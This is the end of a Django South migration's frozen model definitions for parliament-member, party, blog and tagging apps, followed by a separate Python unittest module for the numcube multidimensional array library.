'number_of_children': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'parties': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'all_members'", 'symmetrical': 'False', 'through': "orm['mks.Membership']", 'to': "orm['mks.Party']"}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'}),
'place_of_birth': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'place_of_residence': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'year_of_aliyah': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
'mks.membership': {
'Meta': {'object_name': 'Membership'},
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'member': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mks.Member']"}),
'party': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mks.Party']"}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
},
'mks.party': {
'Meta': {'object_name': 'Party'},
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_coalition': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'number_of_members': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'number_of_seats': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
},
'planet.blog': {
'Meta': {'object_name': 'Blog'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'unique': 'True', 'max_length': '200', 'db_index': 'True'})
},
'tagging.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
},
'tagging.taggeditem': {
'Meta': {'unique_together': "(('tag', 'content_type', 'object_id'),)", 'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': "orm['tagging.Tag']"})
}
}
complete_apps = ['laws']
|
|
import unittest
import functools
import numpy as np
from numcube import Index, Axis, Cube, stack, concatenate
from numcube.exceptions import InvalidAxisLengthError, NonUniqueDimNamesError
from numcube.utils import is_axis, is_indexed
def year_quarter_cube():
"""Creates a sample 2D cube with axes "year" and "quarter" with shape (3, 4)."""
values = np.arange(12).reshape(3, 4)
ax1 = Index("year", [2014, 2015, 2016])
ax2 = Index("quarter", ["Q1", "Q2", "Q3", "Q4"])
return Cube(values, [ax1, ax2])
def year_quarter_weekday_cube():
"""Creates 3D cube with axes "year", "quarter", "weekday" with shape (3, 4, 7)."""
values = np.arange(3 * 4 * 7).reshape(3, 4, 7)
ax1 = Index("year", [2014, 2015, 2016])
ax2 = Index("quarter", ["Q1", "Q2", "Q3", "Q4"])
ax3 = Index("weekday", ["mon", "tue", "wed", "thu", "fri", "sat", "sun"])
return Cube(values, [ax1, ax2, ax3])
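# Note: both fixtures fill the cube with a plain arange reshaped row-major, so in
# year_quarter_cube() the row for 2014 is [0, 1, 2, 3] and the row for 2016 is
# [8, 9, 10, 11]; several assertions below rely on this layout.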
class CubeTests(unittest.TestCase):
def test_empty_cube(self):
c = Cube([], Axis("x", []))
self.assertEqual(c.ndim, 1)
self.assertEqual(c.dims, ("x",))
self.assertEqual(c.size, 0)
c = Cube(np.empty((0, 0)), [Axis("x", []), Axis("y", [])])
self.assertEqual(c.ndim, 2)
self.assertEqual(c.dims, ("x", "y"))
self.assertEqual(c.size, 0)
def test_create_scalar(self):
c = Cube(1, None)
self.assertEqual(c.ndim, 0)
self.assertEqual(c.size, 1)
c = Cube(None, None)
self.assertEqual(c.ndim, 0)
self.assertEqual(c.size, 1)
c = Cube(1, [])
self.assertEqual(c.ndim, 0)
self.assertEqual(c.size, 1)
def test_create_cube(self):
ax1 = Index("A", [10, 20, 30])
ax2 = Index("B", ["a", "b", "c", "d"])
ax3 = Index("C", [1.1, 1.2])
# test Cube.zeros()
a = Cube.zeros([ax1, ax3])
self.assertTrue(np.array_equal(a.values, [[0, 0], [0, 0], [0, 0]]))
# test Cube.ones()
a = Cube.ones([ax1, ax3])
self.assertTrue(np.array_equal(a.values, [[1, 1], [1, 1], [1, 1]]))
# test Cube.full()
a = Cube.full([ax1, ax3], np.inf)
self.assertTrue(np.array_equal(a.values, [[np.inf, np.inf], [np.inf, np.inf], [np.inf, np.inf]]))
# test Cube.full with NaNs
# note: be careful because NaN != NaN so np.array_equal does not work
a = Cube.full([ax1, ax3], np.nan)
np.testing.assert_equal(a.values, [[np.nan, np.nan], [np.nan, np.nan], [np.nan, np.nan]])
# create one-dimensional cube
values = np.arange(3)
try:
Cube(values, (ax1,))
Cube(values, ax1) # no need to pass axes as collection if there is only one axis
except Exception:
self.fail("raised exception unexpectedly")
# two-dimensional cubes
values = np.arange(12).reshape(3, 4)
try:
Cube(values, (ax1, ax2))
Cube(values, [ax1, ax2])
except Exception:
self.fail("raised exception unexpectedly")
# wrong number of dimensions
self.assertRaises(ValueError, Cube, values, [ax1, ax2, ax3])
# wrong lengths of dimensions
self.assertRaises(ValueError, Cube, values, [ax1, ax3])
self.assertRaises(ValueError, Cube, values, [ax2, ax1])
def test_axes(self):
"""Counting axes, accessing axes by name or index, etc."""
c = year_quarter_cube()
# number of dimensions (axes)
self.assertEqual(c.ndim, 2)
self.assertEqual(c.dims, ("year", "quarter"))
# get axis by index, by name and by axis object
axis1 = c.axis(0)
axis2 = c.axis("year")
self.assertEqual(axis1, axis2)
axis3 = c.axis(-2) # counting backwards
self.assertEqual(axis1, axis3)
axis4 = c.axis(axis1)
self.assertEqual(axis1, axis4)
# invalid axis identification raises LookupError
self.assertRaises(LookupError, c.axis, "bad_axis")
self.assertRaises(LookupError, c.axis, 3)
self.assertRaises(LookupError, c.axis, Axis("bad_axis", []))
# invalid argument types
self.assertRaises(TypeError, c.axis, 1.0)
self.assertRaises(TypeError, c.axis, None)
def test_axis_index(self):
c = year_quarter_cube()
# get axis index by name
self.assertEqual(c.axis_index("year"), 0)
self.assertEqual(c.axis_index("quarter"), 1)
# get axis index by Axis object
self.assertEqual(c.axis_index(c.axis(0)), 0)
self.assertEqual(c.axis_index(c.axis(1)), 1)
# get axis index by index (negative turns to positive)
self.assertEqual(c.axis_index(0), 0)
self.assertEqual(c.axis_index(-2), 0)
# invalid axes
self.assertRaises(LookupError, c.axis_index, "bad_axis")
self.assertRaises(LookupError, c.axis_index, Axis("bad_axis", []))
self.assertRaises(LookupError, c.axis_index, 2)
# invalid argument types
self.assertRaises(TypeError, c.axis_index, 1.0)
self.assertRaises(TypeError, c.axis_index, None)
def test_has_axis(self):
c = year_quarter_cube()
# whether axis exists - by name
self.assertTrue(c.has_axis("year"))
self.assertFalse(c.has_axis("bad_axis"))
# whether axis exists - by index (negative index means counting backwards)
self.assertTrue(c.has_axis(1))
self.assertFalse(c.has_axis(2))
self.assertTrue(c.has_axis(-1))
self.assertFalse(c.has_axis(-3))
# whether axis exists - by Axis object
ax1 = c.axis(0)
self.assertTrue(c.has_axis(ax1))
ax2 = Axis("year", []) # same name but different identity
self.assertFalse(c.has_axis(ax2))
# invalid argument types
self.assertRaises(TypeError, c.has_axis, 1.0)
self.assertRaises(TypeError, c.has_axis, None)
def test_getitem(self):
"""Getting items by row and column, slicing etc. using __getitem__(item)"""
c = year_quarter_cube()
d = c[0:2, 0:3]
self.assertTrue(np.array_equal(d.values, [[0, 1, 2], [4, 5, 6]]))
self.assertEqual(d.ndim, 2)
self.assertEqual(tuple(d.dims), ("year", "quarter"))
# indexing - will collapse (i.e. remove) axis
d = c[0]
self.assertEqual(d.ndim, 1)
self.assertEqual(d.axis(0).name, "quarter")
self.assertTrue(np.array_equal(d.values, [0, 1, 2, 3]))
d = c[:, 0]
self.assertEqual(d.ndim, 1)
self.assertEqual(d.axis(0).name, "year")
self.assertTrue(np.array_equal(d.values, [0, 4, 8]))
# slicing - will not collapse axis
d = c[0:1]
self.assertEqual(d.ndim, 2)
self.assertTrue(np.array_equal(d.values, [[0, 1, 2, 3]]))
d = c[slice(0, 1)]
self.assertEqual(d.ndim, 2)
self.assertTrue(np.array_equal(d.values, [[0, 1, 2, 3]]))
d = c[:, 0:1]
self.assertEqual(d.ndim, 2)
self.assertTrue(np.array_equal(d.values, [[0], [4], [8]]))
d = c[(slice(0, None), slice(0, 1))]
self.assertEqual(d.ndim, 2)
self.assertTrue(np.array_equal(d.values, [[0], [4], [8]]))
# using negative indices
self.assertTrue(np.array_equal(c[-1].values, [8, 9, 10, 11]))
self.assertTrue(np.array_equal(c[:, -1].values, [3, 7, 11]))
# wrong index
self.assertRaises(IndexError, c.__getitem__, 5)
        # e.g. c[0, 0, 0] raises IndexError: too many indices
self.assertRaises(IndexError, c.__getitem__, (0, 0, 0))
        # wrong number of slices
self.assertRaises(IndexError, c.__getitem__, (slice(0, 2), slice(0, 2), slice(0, 2)))
# np.newaxis is not supported
self.assertRaises(ValueError, c.__getitem__, (0, 0, np.newaxis))
self.assertRaises(ValueError, c.__getitem__, (np.newaxis, 0, 0))
def test_filter(self):
"""Testing function Cube.filter()"""
c = year_quarter_cube()
d = c.filter("year", [2014, 2018]) # 2018 is ignored
self.assertEqual(d.ndim, 2)
self.assertTrue((d.values == c.values[0]).all())
year_filter = Axis("year", range(2010, 2015))
d = c.filter(year_filter)
self.assertEqual(d.ndim, 2)
self.assertTrue((d.values == c.values[0]).all())
year_filter = Index("year", range(2010, 2015))
d = c.filter(year_filter)
self.assertEqual(d.ndim, 2)
self.assertTrue((d.values == c.values[0]).all())
country_filter = Axis("country", ["DE", "FR"]) # this axis is ignored
# filter by two axis filters
quarter_filter = Index("quarter", ["Q1", "Q3"])
d = c.filter([quarter_filter, country_filter, year_filter])
self.assertEqual(d.ndim, 2)
self.assertTrue((d.values == c.values[[0, 0], [0, 2]]).all())
# cube as a filter
yq_cube_filter = Cube.ones([quarter_filter, year_filter, country_filter])
d = c.filter(yq_cube_filter)
self.assertEqual(d.ndim, 2)
self.assertTrue((d.values == c.values[[0, 0], [0, 2]]).all())
# a collection of cubes as a filter
y_cube_filter = Cube.ones([year_filter, country_filter])
q_cube_filter = Cube.ones([country_filter, quarter_filter])
d = c.filter([y_cube_filter, q_cube_filter])
self.assertEqual(d.ndim, 2)
self.assertTrue((d.values == c.values[[0, 0], [0, 2]]).all())
def test_exclude(self):
"""Testing function Cube.exclude()"""
# TODO complete tests
c = year_quarter_cube()
d = c.exclude("year", [2015, 2016, 2018]) # 2018 is ignored
self.assertEqual(d.ndim, 2)
self.assertTrue((d.values == c.values[0]).all())
# for large collections it is better for performance to pass the parameter as a set
d = c.exclude("year", set(range(2015, 3000)))
self.assertEqual(d.ndim, 2)
self.assertTrue((d.values == c.values[0]).all())
def test_apply(self):
"""Applies a function on each cube element."""
c = year_quarter_weekday_cube()
# apply vectorized function
d = c.apply(np.sin)
self.assertTrue(np.array_equal(np.sin(c.values), d.values))
# apply non-vectorized function
import math
e = c.apply(math.sin)
self.assertTrue((e == d).all())
# apply lambda
f = c.apply(lambda v: 1 if 6 <= v <= 8 else 0)
        self.assertEqual(f.sum(), 3)
def test_masked(self):
"""Masking cube values."""
# TODO
pass
def test_squeeze(self):
"""Removes axes which have only one element."""
ax1 = Index("A", [1]) # has only one element, thus can be collapsed
ax2 = Index("B", [1, 2, 3])
c = Cube([[1, 2, 3]], [ax1, ax2])
self.assertEqual(c.ndim, 2)
d = c.squeeze()
self.assertEqual(d.ndim, 1)
self.assertEqual(d.axis(0).name, "B")
c = Cube([[1], [2], [3]], [ax2, ax1])
self.assertEqual(c.ndim, 2)
d = c.squeeze()
self.assertEqual(d.ndim, 1)
self.assertEqual(d.axis(0).name, "B")
ax3 = Index("C", [1]) # has only one element, thus can be collapsed
c = Cube([[1]], [ax1, ax3])
self.assertEqual(c.ndim, 2)
d = c.squeeze() # will collapse both axes
self.assertEqual(d.ndim, 0)
def test_transpose(self):
c = year_quarter_weekday_cube()
# transpose by axis indices
d = c.transpose([1, 0, 2])
self.assertEqual(d.shape, (4, 3, 7))
self.assertEqual(d.dims, ("quarter", "year", "weekday"))
# check that original cube has not been changed
self.assertEqual(c.shape, (3, 4, 7))
self.assertEqual(c.dims, ("year", "quarter", "weekday"))
# compare with numpy transpose
self.assertTrue(np.array_equal(d.values, c.values.transpose([1, 0, 2])))
# transpose by axis names
e = c.transpose(["quarter", "year", "weekday"])
self.assertEqual(e.dims, ("quarter", "year", "weekday"))
self.assertTrue(np.array_equal(d.values, e.values))
# transpose axes specified by negative indices
e = c.transpose([-2, -3, -1])
self.assertTrue(np.array_equal(d.values, e.values))
# specify 'front' argument (does not need to be specified explicitly)
e = c.transpose(["quarter", "year"])
self.assertTrue(np.array_equal(d.values, e.values))
e = c.transpose([1, 0])
self.assertTrue(np.array_equal(d.values, e.values))
# specify 'back' argument
e = c.transpose(back=["year", "weekday"])
self.assertTrue(np.array_equal(d.values, e.values))
e = c.transpose(back=[0, 2])
self.assertTrue(np.array_equal(d.values, e.values))
# specify 'front' and 'back' argument
e = c.transpose(front="quarter", back="weekday")
self.assertTrue(np.array_equal(d.values, e.values))
# transpose with wrong axis indices
self.assertRaises(LookupError, c.transpose, [3, 0, 2])
self.assertRaises(LookupError, c.transpose, [-5, 0, 1])
# transpose with wrong axis names
self.assertRaises(LookupError, c.transpose, ["A", "B", "C"])
# invalid axis identification raises LookupError
self.assertRaises(LookupError, c.transpose, ["year", "weekday", "quarter", "A"])
self.assertRaises(LookupError, c.transpose, [1, 0, 2, 3])
# duplicate axes raise ValueError
self.assertRaises(ValueError, c.transpose, [0, 0, 2])
self.assertRaises(ValueError, c.transpose, ["year", "year", "quarter"])
self.assertRaises(ValueError, c.transpose, front=["year", "weekday"], back=["year", "quarter"])
self.assertRaises(ValueError, c.transpose, front=[1, 2], back=[0, 1])
# invalid types
self.assertRaises(TypeError, c.transpose, [1.1, 0, 2])
self.assertRaises(TypeError, c.transpose, [None, "weekday", "year"])
def test_operations(self):
values = np.arange(12).reshape(3, 4)
axc1 = Index("a", [10, 20, 30])
axc2 = Index("b", ["a", "b", "c", "d"])
c = Cube(values, [axc1, axc2])
axd1 = Index("a", [10, 20, 30])
axd2 = Index("b", ["a", "b", "c", "d"])
d = Cube(values, [axd1, axd2])
x = c * d
self.assertTrue(np.array_equal(x.values, values * values))
e = Cube([0, 1, 2], [Index("a", [10, 20, 30])])
x2 = c * e
self.assertTrue(np.array_equal(x2.values, values * np.array([[0], [1], [2]])))
c3 = Cube([0, 1, 2, 3], [Index("b", ["a", "b", "c", "d"])])
x3 = c * c3
self.assertTrue(np.array_equal(x3.values, values * np.array([0, 1, 2, 3])))
c3 = Cube([0, 1, 2, 3], [Index("b", ["b", "a", "c", "d"])])
x3 = c * c3
self.assertTrue(np.array_equal(x3.values, values * np.array([1, 0, 2, 3])))
values_d = np.array([0, 1])
d = Cube(values_d, [Index("d", ["d1", "d2"])])
x = c * d
self.assertEqual(x.ndim, 3)
self.assertEqual(x.axis(0).name, "a")
self.assertEqual(x.axis(1).name, "b")
self.assertEqual(x.axis(2).name, "d")
self.assertTrue(np.array_equal(x.values, values.reshape(3, 4, 1) * values_d))
# operations with scalar
d = 10
x = c * d
self.assertTrue(np.array_equal(x.values, values * d))
x = d * c
self.assertTrue(np.array_equal(x.values, values * d))
# operations with numpy.ndarray
d = np.arange(4)
x = c * d
self.assertTrue(np.array_equal(x.values, values * d))
x = d * c
self.assertTrue(np.array_equal(x.values, values * d))
d = np.arange(3).reshape(3, 1)
x = c * d
self.assertTrue(np.array_equal(x.values, values * d))
x = d * c
self.assertTrue(np.array_equal(x.values, values * d))
        # matching Index and Axis
values_d = np.array([0, 1])
d = Cube(values_d, Axis("a", [10, 10]))
x = c * d
self.assertTrue(np.array_equal(x.values, values.take([0, 0], 0) * values_d[:, np.newaxis]))
values_d = np.array([0, 1, 2, 3])
d = Cube(values_d, Axis("b", ["d", "d", "c", "a"]))
x = c * d
self.assertTrue(np.array_equal(x.values, values.take([3, 3, 2, 0], 1) * values_d))
# unary plus and minus
c = year_quarter_cube()
self.assertTrue(np.array_equal((+c).values, c.values))
self.assertTrue(np.array_equal((-c).values, -c.values))
c = year_quarter_cube() + 1 # +1 to prevent division by zero error
import operator as op
ops = [op.add, op.mul, op.floordiv, op.truediv, op.sub, op.pow, op.mod, # arithmetics ops
op.eq, op.ne, op.ge, op.le, op.gt, op.lt, # comparison ops
op.and_, op.or_, op.xor, op.rshift, op.lshift] # bitwise ops
# operations with scalar
d = 2
for op in ops:
self.assertTrue(np.array_equal(op(c, d).values, op(c.values, d)))
self.assertTrue(np.array_equal(op(d, c).values, op(d, c.values)))
        # operations with numpy array
        d = (np.arange(12).reshape(3, 4) / 6 + 1).astype(int)  # +1 to prevent division by zero error
for op in ops:
self.assertTrue(np.array_equal(op(c, d).values, op(c.values, d)))
self.assertTrue(np.array_equal(op(d, c).values, op(d, c.values)))
def test_group_by(self):
values = np.arange(12).reshape(3, 4)
ax1 = Axis("year", [2014, 2014, 2014])
ax2 = Axis("month", ["jan", "jan", "feb", "feb"])
c = Cube(values, [ax1, ax2])
d = c.reduce(np.mean, group=0) # average by year
self.assertTrue(np.array_equal(d.values, np.array([[4, 5, 6, 7]])))
self.assertTrue(is_indexed(d.axis(0)))
self.assertEqual(len(d.axis(0)), 1)
self.assertEqual(d.values.shape, (1, 4)) # axes with length of 1 are not collapsed
d = c.reduce(np.sum, group=ax2.name, sort_grp=False) # sum by month
self.assertTrue(np.array_equal(d.values, np.array([[1, 5], [9, 13], [17, 21]])))
self.assertTrue(np.array_equal(d.axis(ax2.name).values, ["jan", "feb"]))
d = c.reduce(np.sum, group=ax2.name) # sum by month, sorted by default
self.assertTrue(np.array_equal(d.values, np.array([[5, 1], [13, 9], [21, 17]])))
self.assertTrue(np.array_equal(d.axis(ax2.name).values, ["feb", "jan"]))
self.assertTrue(is_indexed(d.axis(ax2.name)))
self.assertEqual(len(d.axis(ax2.name)), 2)
self.assertEqual(d.values.shape, (3, 2))
# testing various aggregation functions using direct calling, e.g. c.sum(group=0),
# or indirect calling, e.g. reduce(func=np.sum, group=0)
funcs_indirect = [np.sum, np.mean, np.median, np.min, np.max, np.prod]
funcs_direct = [c.sum, c.mean, c.median, c.min, c.max, c.prod]
for func_indirect, func_direct in zip(funcs_indirect, funcs_direct):
result = np.apply_along_axis(func_indirect, 0, c.values)
d = c.reduce(func_indirect, group=ax1.name)
self.assertTrue(np.array_equiv(d.values, result))
e = func_direct(group=ax1.name)
self.assertTrue(np.array_equiv(e.values, result))
# testing function with extra parameters which cannot be passed as *args
third_quartile = functools.partial(np.percentile, q=75)
d = c.reduce(third_quartile, group=ax1.name)
self.assertTrue(np.array_equiv(d.values, np.apply_along_axis(third_quartile, 0, c.values)))
# the same but using lambda - this is actually simpler and more powerful way
third_quartile_lambda = lambda sample: np.percentile(sample, q=75)
d = c.reduce(third_quartile_lambda, group=ax1.name)
self.assertTrue(np.array_equiv(d.values, np.apply_along_axis(third_quartile_lambda, 0, c.values)))
def test_rename_axis(self):
c = year_quarter_cube()
# axes by name
d = c.rename_axis("year", "Y")
d = d.rename_axis("quarter", "Q")
self.assertEqual(tuple(d.dims), ("Y", "Q"))
# axes by index
d = c.rename_axis(0, "Y")
d = d.rename_axis(1, "Q")
self.assertEqual(tuple(d.dims), ("Y", "Q"))
# axes with negative indices
d = c.rename_axis(-2, "Y")
d = d.rename_axis(-1, "Q")
self.assertEqual(tuple(d.dims), ("Y", "Q"))
# invalid new axis name type
self.assertRaises(TypeError, c.rename_axis, 0, 0.0)
self.assertRaises(TypeError, c.rename_axis, "year", None)
# duplicate axes
self.assertRaises(ValueError, c.rename_axis, 0, "quarter")
self.assertRaises(ValueError, c.rename_axis, "year", "quarter")
# non-existing axes
self.assertRaises(LookupError, c.rename_axis, 2, "quarter")
self.assertRaises(LookupError, c.rename_axis, "bad_axis", "quarter")
def test_slice(self):
c = year_quarter_weekday_cube()
ax = 0
d = c.slice(ax, None, None, 2) # every even item
self.assertTrue(np.array_equal(d.values, c.values[:, :, ::2]))
self.assertTrue(np.array_equal(d.axis(ax).values, c.axis(ax).values[::2]))
def test_first(self):
c = year_quarter_weekday_cube()
ax = "year"
d = c.first(ax, 2)
self.assertTrue(np.array_equal(d.values, c.values[0: 2]))
self.assertTrue(np.array_equal(d.axis(ax).values, c.axis(ax).values[0: 2]))
def test_last(self):
c = year_quarter_weekday_cube()
ax = "quarter"
d = c.last(ax, 2)
self.assertTrue(np.array_equal(d.values, c.values[:, -2:]))
self.assertTrue(np.array_equal(d.axis(ax).values, c.axis(ax).values[-2:]))
def test_reversed(self):
c = year_quarter_weekday_cube()
ax = "weekday"
d = c.reversed(ax)
self.assertTrue(np.array_equal(d.values, c.values[:, :, ::-1]))
self.assertTrue(np.array_equal(d.axis(ax).values, c.axis(ax).values[::-1]))
def test_diff(self):
c = year_quarter_weekday_cube()
d = c.diff("year")
self.assertTrue(np.array_equal(d.values, np.diff(c.values, n=1, axis=0)))
self.assertTrue(np.array_equal(d.axis("year").values, [2015, 2016]))
d = c.diff("quarter", n=2)
self.assertTrue(np.array_equal(d.values, np.diff(c.values, n=2, axis=1)))
self.assertTrue(np.array_equal(d.axis("quarter").values, ["Q3", "Q4"]))
d = c.diff("weekday", n=4, axis_shift=0)
self.assertTrue(np.array_equal(d.values, np.diff(c.values, n=4, axis=2)))
self.assertTrue(np.array_equal(d.axis("weekday").values, ["mon", "tue", "wed"]))
def test_growth(self):
c = year_quarter_cube() + 1 # to prevent division by zero
d = c.growth("year")
self.assertTrue(np.array_equal(d.values, c.values[1:, :] / c.values[:-1, :]))
self.assertTrue(np.array_equal(d.axis("year").values, c.axis("year").values[1:]))
d = c.growth(1) # 1 = quarter axis
self.assertTrue(np.array_equal(d.values, c.values[:, 1:] / c.values[:, :-1]))
d = c.growth("year", axis_shift=0)
self.assertTrue(np.array_equal(d.values, c.values[1:, :] / c.values[:-1, :]))
self.assertTrue(np.array_equal(d.axis("year").values, c.axis("year").values[:-1]))
def test_aggregate(self):
c = year_quarter_cube()
self.assertTrue((c.sum("quarter") == c.sum(1)).all())
self.assertTrue((c.sum("quarter") == c.sum(-1)).all())
self.assertTrue((c.sum("year") == c.sum(keep=1)).all())
self.assertTrue((c.sum("year") == c.sum(keep=-1)).all())
self.assertTrue((c.sum(["year"]) == c.sum(keep=[-1])).all())
self.assertTrue((c.sum("quarter") == c.sum(keep="year")).all())
year_ax = c.axis("year")
quarter_ax = c.axis("quarter")
self.assertTrue((c.sum(year_ax) == c.sum("year")).all())
self.assertTrue((c.sum(year_ax) == c.sum(keep=quarter_ax)).all())
self.assertTrue((c.sum(quarter_ax) == c.sum(1)).all())
self.assertTrue((c.sum(quarter_ax) == c.sum(keep=0)).all())
self.assertEqual(c.sum(None), c.sum())
self.assertEqual(c.sum(), np.sum(c.values))
self.assertEqual(c.mean(), np.mean(c.values))
self.assertEqual(c.min(), np.min(c.values))
self.assertEqual(c.max(), np.max(c.values))
self.assertRaises(LookupError, c.sum, "bad_axis")
self.assertRaises(LookupError, c.sum, 2)
self.assertRaises(TypeError, c.sum, 1.0)
def test_swap_axes(self):
c = year_quarter_weekday_cube()
self.assertEqual(c.shape, (3, 4, 7))
# swap by name
d = c.swap_axes("year", "quarter")
self.assertEqual(tuple(d.dims), ("quarter", "year", "weekday"))
self.assertEqual(d.shape, (4, 3, 7))
# swap by index
d = c.swap_axes(0, 2)
self.assertEqual(tuple(d.dims), ("weekday", "quarter", "year"))
self.assertEqual(d.shape, (7, 4, 3))
# swap by index and name
d = c.swap_axes(0, "quarter")
self.assertEqual(tuple(d.dims), ("quarter", "year", "weekday"))
self.assertEqual(d.shape, (4, 3, 7))
# swap Axis instances
year_axis = c.axis("year")
quarter_axis = c.axis("quarter")
d = c.swap_axes(year_axis, quarter_axis)
self.assertEqual(tuple(d.dims), ("quarter", "year", "weekday"))
self.assertEqual(d.shape, (4, 3, 7))
# wrong axis results in LookupError
self.assertRaises(LookupError, c.sum, "bad_axis")
self.assertRaises(LookupError, c.sum, 3)
def test_align_axis(self):
c = year_quarter_cube()
ax1 = Axis("year", [2015, 2015, 2014, 2014])
ax2 = Index("quarter", ["Q1", "Q3"])
d = c.align(ax1)
d = d.align(ax2)
# test identity of the new axis
self.assertTrue(d.axis("year") is ax1)
self.assertTrue(d.axis("quarter") is ax2)
# test aligned values
self.assertTrue(np.array_equal(d.values, [[4, 6], [4, 6], [0, 2], [0, 2]]))
def test_concatenate(self):
values = np.arange(12).reshape(3, 4)
ax1 = Index("year", [2014, 2015, 2016])
ax2 = Index("month", ["jan", "feb", "mar", "apr"])
c = Cube(values, [ax1, ax2])
values = np.arange(12).reshape(4, 3)
ax3 = Index("year", [2014, 2015, 2016])
ax4 = Index("month", ["may", "jun", "jul", "aug"])
d = Cube(values, [ax4, ax3])
e = concatenate([c, d], "month")
self.assertEqual(e.ndim, 2)
self.assertEqual(e.shape, (8, 3)) # the joined axis is always the first
self.assertTrue(is_axis(e.axis("month")))
e = concatenate([c, d], "month", as_index=True)
self.assertEqual(e.ndim, 2)
self.assertEqual(e.shape, (8, 3))
self.assertTrue(is_indexed(e.axis("month")))
# duplicate index values
self.assertRaises(ValueError, concatenate, [c, c], "month", as_index=True)
# broadcasting of an axis
countries = Axis("country", ["DE", "FR"])
f = d.insert_axis(countries)
g = concatenate([c, f], "month", broadcast=True)
self.assertEqual(g.ndim, 3)
self.assertEqual(g.shape, (8, 3, 2))
# if automatic broadcasting is not allowed
self.assertRaises(LookupError, concatenate, [c, f], "month", broadcast=False)
def test_stack(self):
c = year_quarter_cube()
d = year_quarter_cube()
country_axis = Index("country", ["GB", "FR"])
e = stack([c, d], country_axis)
self.assertEqual(e.values.shape, (2, 3, 4))
        # the merged axis goes first
self.assertEqual(tuple(e.dims), ("country", "year", "quarter"))
# axis with the same name already exists
c = year_quarter_cube()
d = year_quarter_cube()
year_axis = Index("year", [2000, 2001])
self.assertRaises(ValueError, stack, [c, d], year_axis)
# different number of cubes and axis length
c = year_quarter_cube()
d = year_quarter_cube()
country_axis = Index("country", ["GB", "FR", "DE"])
self.assertRaises(ValueError, stack, [c, d], country_axis)
# cubes do not have uniform shapes
c = year_quarter_cube()
d = year_quarter_weekday_cube()
country_axis = Index("country", ["GB", "FR"])
self.assertRaises(LookupError, stack, [c, d], country_axis)
        # the previous example is OK if automatic broadcasting is allowed
e = stack([c, d], country_axis, broadcast=True)
self.assertEqual(e.ndim, 4)
# broadcast axes go last
self.assertEqual(tuple(e.dims), ("country", "year", "quarter", "weekday"))
def test_combine_axes(self):
c = year_quarter_weekday_cube()
# duplicate axes
self.assertRaises(ValueError, c.combine_axes, ["year", "year"], "period", "{}-{}")
self.assertRaises(ValueError, c.combine_axes, ["year", "quarter"], "weekday", "{}-{}")
d = c.combine_axes(["year", "quarter"], "period", "{}-{}")
self.assertEqual(tuple(d.dims), ("period", "weekday"))
def test_take(self):
c = year_quarter_cube()
# axis by name
self.assertTrue(np.array_equal(c.take("year", [0, 1]).values, c.values.take([0, 1], 0)))
self.assertTrue(np.array_equal(c.take("quarter", [0, 1]).values, c.values.take([0, 1], 1)))
# axis by index
self.assertTrue(np.array_equal(c.take(0, [0, 1]).values, c.values.take([0, 1], 0)))
self.assertTrue(np.array_equal(c.take(1, [0, 1]).values, c.values.take([0, 1], 1)))
# do not collapse dimension - a single int in a list or tuple
d = c.take(0, [2])
self.assertEqual(d.ndim, 2)
self.assertTrue(np.array_equal(d.values, c.values.take([2], 0)))
d = c.take(0, (2,))
self.assertEqual(d.ndim, 2)
self.assertTrue(np.array_equal(d.values, c.values.take([2], 0)))
# collapse dimension - a single int
d = c.take(0, 2)
self.assertEqual(d.ndim, 1)
self.assertTrue(np.array_equal(d.values, c.values.take(2, 0)))
# negative index
self.assertTrue(np.array_equal(c.take("year", [-3, -2]).values, c.values.take([0, 1], 0)))
# wrong axes
self.assertRaises(LookupError, c.take, "bad_axis", [0, 1])
self.assertRaises(LookupError, c.take, 2, [0, 1])
# wrong indices
self.assertRaises(IndexError, c.take, "year", 4)
self.assertRaises(IndexError, c.take, "year", [0, 4])
self.assertRaises(ValueError, c.take, "year", ["X"])
self.assertRaises(TypeError, c.take, "year", None)
def test_slice(self):
c = year_quarter_cube()
d = c.slice("year", -1) # except the last one
self.assertTrue(np.array_equal(d.values, c.values[:-1, :]))
d = c.slice(1, 0, 3, 2) # 1 = quarter axis
self.assertTrue(np.array_equal(d.values, c.values[:, 0: 3: 2]))
